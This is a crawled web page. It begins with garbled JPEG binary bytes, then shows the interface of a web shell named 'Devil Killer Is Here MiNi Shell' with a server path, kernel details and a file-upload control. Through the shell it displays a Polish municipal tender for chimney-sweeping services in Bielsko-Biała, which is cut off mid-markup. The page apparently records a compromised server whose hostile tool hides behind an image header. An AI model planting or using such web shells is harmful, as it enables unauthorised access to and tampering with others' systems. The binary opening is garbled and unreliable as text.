JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221230/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221230/0052567701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług kominiarskich w budynkach stanowiących zasobów Gminy Bielsko – Biała będących w zarządzie Zakładu Gospodarki Mieszkaniowej w Bielsku – Białej w podziale na 2 części. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Bielsko-Biała - Zakład Gospodarki Mieszkaniowej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 070019077</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Lipnicka 26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bielsko-Biała</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">33 475 77 25</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zgm.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zgm.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług kominiarskich w budynkach stanowiących zasobów Gminy Bielsko – Biała będących w zarządzie Zakładu Gospodarki Mieszkaniowej w Bielsku – Białej w podziale na 2 części. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7455f9df-8831-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00525677</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00028920/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Świadczenie usług kominiarskich w lokalach i budynkach stanowiących zasób Gminy Bielsko-Biała, zarządzany przez Zakład Gospodarki Mieszkaniowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/Postepowania/c480966b-3a62-4bc8-ad2e-76619bf5752c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) przy użyciu miniPortalu, który dostępny jest pod adresem:<br/>https://miniportal.uzp.gov.pl/;<br/>2) ePUAPu, dostępnego pod adresem https://epuap.gov.pl/wps/portal ,<br/>3) poczty elektronicznej pod adresem przetargi@zgm.eu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na<br/>ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza<br/>do komunikacji”.<br/>2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>3. Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki.<br/>Zamawiający dopuszcza i rekomenduje składanie dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w pkt<br/>2 adres poczty elektronicznej. Sposób sporządzenia dokumentów elektronicznych musi być<br/>zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu<br/>Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych<br/>dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający zrealizował obowiązek informacyjny w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający zrealizował obowiązek informacyjny w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZGM/22/208/NJ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Gospodarki Mieszkaniowej w Bielsku – Białej w nieruchomościach zarządzanych przez ZGM, w następującym zakresie:<br/>1) obowiązkowego czyszczenia przewodów kominowych (dymowych, spalinowych, wentylacyjnych) wraz z wybieraniem i<br/>wyniesieniem sadzy oraz widocznych zanieczyszczeń za kratek wentylacyjnych, zgodnie z Rozporządzeniem Ministra<br/>Spraw Wewnętrznych i Administracji z dnia 07.06.2010 r. w sprawie ochrony przeciwpożarowej budynków i innych obiektów<br/>budowlanych i terenów (t.j. Dz. U. 2010 nr 109 poz. 719<br/>z późn. zm.) z częstotliwością:<br/> dymowych – 4 razy w roku<br/> spalinowych – 2 razy w roku<br/> wentylacyjnych - 1 raz w roku<br/>2) sprawdzenie stanu technicznego sprawności przewodów kominowych, łącznie ze wskazaniem ich nieszczelności,<br/>3) okresowa roczna kontrola stanu technicznej sprawności przewodów kominowych (wentylacyjnych, spalinowych i<br/>dymowych), zgodnie z art. 62 ustawy Prawo budowlane<br/>w budynkach będących w zarządzie Zakładu Gospodarki Mieszkaniowej,<br/>4) wykonywanie pozostałych usług kominiarskich w zakresie określonych w „Formularzach cenowych”, w ilości wynikającej z<br/>bieżących potrzeb Zamawiającego w budynkach administrowanych przez ZGM w Bielsku – Białej, których wykaz stanowi<br/>załączniki do Specyfikacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90915000-4 - Usługi czyszczenia pieców i kominów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71356100-9 - Usługi kontroli technicznej</p> <p class="mb-0">71315410-6 - Kontrola systemu wentylacji</p> <p class="mb-0">71321400-8 - Usługi konsultacyjne w zakresie wentylacji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty na podstawie poniższych kryteriów:<br/>1) cena oferty brutto („KC”) 1) - waga 60 %<br/>2) okres rękojmi („KOr”)2) - waga 20 %<br/>3) kara umowna za zwłokę w terminie wykonania robót zleconych zleceniem, o którym mowa w § 5 ust. 1 wzoru umowy („KKu”) 3) -<br/>waga 20 %<br/>1) do oceny ofert Zamawiający przyjmie cenę brutto oferty.<br/>2) okres rękojmi – wybrany przez Wykonawcę, z tym, że nie krótszy niż 12 miesięcy oraz nie dłuższy niż<br/>24 miesiące, licząc od daty bezusterkowego końcowego protokołu odbioru usługi.<br/>Oferty z okresem krótszym niż okres wymagany 12 miesięcy będą odrzucone na podstawie<br/>art. 226 ust. 1 pkt 5 ustawy, jako niezgodne z warunkami zamówienia.<br/>W przypadku ofert z okresem dłuższym niż okres maksymalny 24 miesiące, Zamawiający przyjmie do oceny oferty okres 24<br/>miesiące<br/>3) kara umowna za zwłokę w terminowym wykonaniu robót zleconych poszczególnymi zleceniami - kwota wybrana przez<br/>Wykonawcę, z tym, że nie niższa niż 100,00 zł oraz nie wyższa niż 200,00 zł.<br/>Oferty z kwotą kary umownej niższą niż 100,00 zł będą odrzucone na podstawie art. 226 ust. 1 pkt 5 ustawy, jako niezgodne z<br/>warunkami zamówienia.<br/>W przypadku ofert z kwotą kary umownej wyższą niż 200,00 zł, Zamawiający przyjmie do oceny karę umowną 200,00 zł.<br/>20% kary zaoferowanej kary umownej stanowi karę za zwłokę w usunięciu wad i/lub usterek stwierdzonych przy odbiorze wykonania<br/>zleconych usług lub w okresie rękojmi za wady, zgodnie<br/>z postanowieniami § 12 ust. 1 pkt 1 lit. c) umowy wg wzoru stanowiącego załącznik do Specyfikacji,<br/>1. Kryterium ceny brutto KC będzie wyliczane wg wzoru:<br/>1) ofercie najtańszej przyznaje się maksymalną liczbę punktów – 100, i wylicza się kryterium KC wg wzoru:<br/>KCon = 100 x waga (60%) x liczba członków komisji (3)<br/>2) każdej następnej ofercie przyznaje się liczbę punktów proporcjonalnie niższą, wyliczoną wg wzoru:<br/>KCoo = Con x 100 x waga (60%) x liczba członków komisji (3)<br/>Ogłoszenie nr 2022/BZP 00500053 z dnia 2022-12-16<br/>2022-12-16 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>Coo<br/>gdzie:<br/>Con - cena oferty najtańszej<br/>Coo - cena oferty ocenianej<br/>2. Kryterium okresu rękojmi KOr będzie wyliczane wg wzoru:<br/>1) ofercie o najdłuższym okresie rękojmi przyznaje się maksymalną liczbę punktów – 100, i wylicza się kryterium KOrg wg wzoru:<br/>KOrn = 100 x waga (20%) x liczba członków komisji (3)<br/>2) każdej następnej ofercie przyznaje się liczbę punktów proporcjonalnie niższą, wyliczoną wg wzoru:<br/>KOro = Roo x 100 x waga (20%) x liczba członków komisji (3)<br/>Ron<br/>gdzie:<br/>Roo – okres rękojmi oferty ocenianej,<br/>Ron – najdłuższy zaoferowany okres rękojmi<br/>3. Kryterium kary umownej KKu będzie wyliczane wg wzoru:<br/>1) ofercie z najwyższą kwotą kary umownej przyznaje się maksymalną liczbę punktów – 100, i wylicza się kryterium KKu1 wg wzoru:<br/>KKun = 100 x waga (20%) x liczba członków komisji (3)<br/>2) każdej następnej ofercie przyznaje się liczbę punktów proporcjonalnie niższą, wyliczoną wg wzoru:<br/>KKu1oo = Kuoo x 100 x waga (20%) x liczba członków komisji (3)<br/>Kuon<br/>gdzie:<br/>Kuoo – kwota kary umownej w ofercie ocenianej<br/>Kuon – najwyższa zaoferowana kwota kary umownej.<br/>1. Za najkorzystniejszą ofertę Zamawiający uzna ofertę przedstawiającą najkorzystniejszy bilans kryteriów oceny ofert, wyliczony wg<br/>wzoru:<br/>PO = KC + KKm + KOg</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kara umowna za zwłokę w terminie wykonania robót zleconych zleceniem, o którym mowa w § 5 ust. 1 wzoru umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia, dla części 1 i 2 zamówienia, jest wykonywanie usług kominiarskich na potrzeby Zakładu<br/>Gospodarki Mieszkaniowej w Bielsku – Białej w nieruchomościach zarządzanych przez ZGM, w następującym zakresie:<br/>1) obowiązkowego czyszczenia przewodów kominowych (dymowych, spalinowych, wentylacyjnych) wraz z wybieraniem i<br/>wyniesieniem sadzy oraz widocznych zanieczyszczeń za kratek wentylacyjnych, zgodnie z Rozporządzeniem Ministra<br/>Spraw Wewnętrznych i Administracji z dnia 07.06.2010 r. w sprawie ochrony przeciwpożarowej budynków i innych obiektów<br/>budowlanych i terenów (t.j. Dz. U. 2010 nr 109 poz. 719<br/>z późn. zm.) z częstotliwością:<br/> dymowych – 4 razy w roku<br/> spalinowych – 2 razy w roku<br/> wentylacyjnych - 1 raz w roku<br/>2) sprawdzenie stanu technicznego sprawności przewodów kominowych, łącznie ze wskazaniem ich nieszczelności,<br/>3) okresowa roczna kontrola stanu technicznej sprawności przewodów kominowych (wentylacyjnych, spalinowych i<br/>dymowych), zgodnie z art. 62 ustawy Prawo budowlane<br/>w budynkach będących w zarządzie Zakładu Gospodarki Mieszkaniowej,<br/>4) wykonywanie pozostałych usług kominiarskich w zakresie określonych w „Formularzach cenowych”, w ilości wynikającej z<br/>bieżących potrzeb Zamawiającego w budynkach administrowanych przez ZGM w Bielsku – Białej, których wykaz stanowi<br/>załączniki do Specyfikacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90915000-4 - Usługi czyszczenia pieców i kominów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71356100-9 - Usługi kontroli technicznej</p> <p class="mb-0">71315410-6 - Kontrola systemu wentylacji</p> <p class="mb-0">71321400-8 - Usługi konsultacyjne w zakresie wentylacji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty na podstawie poniższych kryteriów:<br/>1) cena oferty brutto („KC”) 1) - waga 60 %<br/>2) okres rękojmi („KOr”)2) - waga 20 %<br/>3) kara umowna za zwłokę w terminie wykonania robót zleconych zleceniem, o którym mowa w § 5 ust. 1 wzoru umowy („KKu”) 3) -<br/>waga 20 %<br/>1) do oceny ofert Zamawiający przyjmie cenę brutto oferty.<br/>2) okres rękojmi – wybrany przez Wykonawcę, z tym, że nie krótszy niż 12 miesięcy oraz nie dłuższy niż<br/>24 miesiące, licząc od daty bezusterkowego końcowego protokołu odbioru usługi.<br/>Oferty z okresem krótszym niż okres wymagany 12 miesięcy będą odrzucone na podstawie<br/>art. 226 ust. 1 pkt 5 ustawy, jako niezgodne z warunkami zamówienia.<br/>W przypadku ofert z okresem dłuższym niż okres maksymalny 24 miesiące, Zamawiający przyjmie do oceny oferty okres 24<br/>miesiące<br/>3) kara umowna za zwłokę w terminowym wykonaniu robót zleconych poszczególnymi zleceniami - kwota wybrana przez<br/>Wykonawcę, z tym, że nie niższa niż 100,00 zł oraz nie wyższa niż 200,00 zł.<br/>Oferty z kwotą kary umownej niższą niż 100,00 zł będą odrzucone na podstawie art. 226 ust. 1 pkt 5 ustawy, jako niezgodne z<br/>warunkami zamówienia.<br/>W przypadku ofert z kwotą kary umownej wyższą niż 200,00 zł, Zamawiający przyjmie do oceny karę umowną 200,00 zł.<br/>20% kary zaoferowanej kary umownej stanowi karę za zwłokę w usunięciu wad i/lub usterek stwierdzonych przy odbiorze wykonania<br/>zleconych usług lub w okresie rękojmi za wady, zgodnie<br/>z postanowieniami § 12 ust. 1 pkt 1 lit. c) umowy wg wzoru stanowiącego załącznik do Specyfikacji,<br/>1. Kryterium ceny brutto KC będzie wyliczane wg wzoru:<br/>1) ofercie najtańszej przyznaje się maksymalną liczbę punktów – 100, i wylicza się kryterium KC wg wzoru:<br/>KCon = 100 x waga (60%) x liczba członków komisji (3)<br/>2) każdej następnej ofercie przyznaje się liczbę punktów proporcjonalnie niższą, wyliczoną wg wzoru:<br/>KCoo = Con x 100 x waga (60%) x liczba członków komisji (3)<br/>Ogłoszenie nr 2022/BZP 00500053 z dnia 2022-12-16<br/>2022-12-16 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>Coo<br/>gdzie:<br/>Con - cena oferty najtańszej<br/>Coo - cena oferty ocenianej<br/>2. Kryterium okresu rękojmi KOr będzie wyliczane wg wzoru:<br/>1) ofercie o najdłuższym okresie rękojmi przyznaje się maksymalną liczbę punktów – 100, i wylicza się kryterium KOrg wg wzoru:<br/>KOrn = 100 x waga (20%) x liczba członków komisji (3)<br/>2) każdej następnej ofercie przyznaje się liczbę punktów proporcjonalnie niższą, wyliczoną wg wzoru:<br/>KOro = Roo x 100 x waga (20%) x liczba członków komisji (3)<br/>Ron<br/>gdzie:<br/>Roo – okres rękojmi oferty ocenianej,<br/>Ron – najdłuższy zaoferowany okres rękojmi<br/>3. Kryterium kary umownej KKu będzie wyliczane wg wzoru:<br/>1) ofercie z najwyższą kwotą kary umownej przyznaje się maksymalną liczbę punktów – 100, i wylicza się kryterium KKu1 wg wzoru:<br/>KKun = 100 x waga (20%) x liczba członków komisji (3)<br/>2) każdej następnej ofercie przyznaje się liczbę punktów proporcjonalnie niższą, wyliczoną wg wzoru:<br/>KKu1oo = Kuoo x 100 x waga (20%) x liczba członków komisji (3)<br/>Kuon<br/>gdzie:<br/>Kuoo – kwota kary umownej w ofercie ocenianej<br/>Kuon – najwyższa zaoferowana kwota kary umownej.<br/>1. Za najkorzystniejszą ofertę Zamawiający uzna ofertę przedstawiającą najkorzystniejszy bilans kryteriów oceny ofert, wyliczony wg<br/>wzoru:<br/>PO = KC + KKm + KOg</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 